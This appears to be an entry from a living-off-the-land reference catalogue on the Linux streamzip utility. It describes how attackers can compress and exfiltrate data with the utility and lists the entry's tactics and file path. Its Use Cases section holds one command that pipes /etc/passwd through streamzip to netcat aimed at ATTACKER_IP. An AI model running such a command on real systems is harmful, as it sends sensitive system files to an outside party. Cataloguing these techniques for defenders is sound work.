streamzip

Created by Gabriel De Jesus (0xv1n)

Description

streamzip is a system utility that can be utilized to compress data from “stdin” and write the data directly to “stdout”, no temporary files are created. The tool can be used by malicious actors to collect and exfiltrate sensitive data without leaving staged data archive artifacts on disk.

CreatedTacticsTags
2024-07-15Collection Exfiltrationfiles compress

Paths

  • /usr/bin/streamzip

Use Cases

Copy and compress sensitive data locally

The following command reads file data and compresses the data for exfiltration

dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT

Detections

  • No detection content at time of writing

Resources